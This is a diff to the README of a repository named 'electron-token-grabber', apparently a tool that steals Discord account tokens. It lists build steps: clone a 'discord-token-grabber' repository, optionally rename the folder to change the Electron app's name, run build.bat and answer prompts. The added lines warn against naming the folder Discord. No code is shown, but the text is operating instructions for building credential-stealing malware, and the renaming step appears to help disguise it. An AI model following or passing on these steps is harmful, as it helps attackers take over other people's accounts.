spinfal/electron-token-grabber/README.md

 ## How to get it working
 - Run `git clone https://github.com/spinfal/discord-token-grabber.git`
-- (optional) Rename the folder to change the Electron app name
+- (optional) Rename the folder to change the Electron app name. **Do NOT set the folder name to Discord.
+That will mess up your actual Discord installation and you will need to reinstall Discord.**
 - Run `build.bat`
 - Answer provided prompts